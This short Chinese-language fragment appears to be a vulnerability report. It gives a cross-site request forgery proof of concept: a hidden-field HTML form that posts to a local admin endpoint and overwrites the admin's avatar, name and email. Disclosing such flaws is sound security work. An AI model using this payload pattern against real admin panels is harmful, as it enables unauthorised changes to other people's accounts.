代码拉取完成,页面将自动刷新
建立如下页面
<form action="http://127.0.0.1:28083/admin/configurations/userInfo" method="POST" enctype="application/x-www-form-urlencoded"> <input name="yourAvatar" value="hahahaha" hidden> <input name="yourName" value="hahahaha" hidden> <input name="yourEmail" value="hahahaha" hidden> <input type="submit"></form>
攻击前
payload
攻击
效果